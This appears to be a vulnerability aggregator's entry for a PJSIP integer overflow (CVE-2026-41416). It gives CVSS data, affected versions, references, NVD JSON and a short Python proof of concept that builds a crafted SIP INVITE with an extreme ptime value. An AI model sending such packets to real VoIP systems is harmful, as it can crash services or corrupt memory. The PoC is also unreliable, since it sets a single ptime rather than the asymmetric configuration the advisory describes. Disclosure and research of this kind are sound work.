CVE-2026-41416

Description

PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an integer overflow in media stream buffer size calculation when processing SDP with asymmetric ptime configuration. The overflow may result in an undersized buffer allocation, which can lead to unexpected application termination or memory corruption This vulnerability is fixed in 2.17.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:* - VULNERABLE

PJSIP <= 2.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket # PoC for CVE-2026-41416: PJSIP Integer Overflow via Asymmetric ptime # This script sends a crafted SIP INVITE with malicious SDP to trigger the buffer calculation overflow. TARGET_IP = "127.0.0.1" TARGET_PORT = 5060 # Crafted SDP with extreme ptime values to trigger integer overflow in buffer size calculation # PJSIP calculates buffer size based on ptime. Asymmetric or large values cause the overflow. malicious_sdp = f"""v=0 o=user 123 123 IN IP4 {TARGET_IP} s=session c=IN IP4 {TARGET_IP} t=0 0 m=audio 12345 RTP/AVP 0 a=rtpmap:0 PCMU/8000 a=ptime:65535 """ sip_request = f"""INVITE sip:test@{TARGET_IP} SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK-overflow Max-Forwards: 70 To: sip:test@{TARGET_IP} From: sip:[email protected];tag=123 Call-ID: [email protected] CSeq: 1 INVITE Contact: sip:[email protected] Content-Type: application/sdp Content-Length: {len(malicious_sdp)} {malicious_sdp}""" print("Sending malicious SIP packet to PJSIP target...") # Note: Actual network sending requires a running SIP server/client on the target. # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # sock.sendto(sip_request.encode(), (TARGET_IP, TARGET_PORT))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41416
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41416
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41416/
[4] VulDB https://vuldb.com/cve/CVE-2026-41416
[5] https://github.com/pjsip/pjproject/commit/66fe416c96e957417621b7be16e9e587d159f9bb
[6] https://github.com/pjsip/pjproject/security/advisories/GHSA-f33g-8hjq-62xr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41416", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.327", "lastModified": "2026-04-28T18:30:20.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an integer overflow in media stream buffer size calculation when processing SDP with asymmetric ptime configuration. The overflow may result in an undersized buffer allocation, which can lead to unexpected application termination or memory corruption This vulnerability is fixed in 2.17."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "3CEC20D0-E450-41AD-BCF9-4E407594F2A7"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/66fe416c96e957417621b7be16e9e587d159f9bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-f33g-8hjq-62xr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}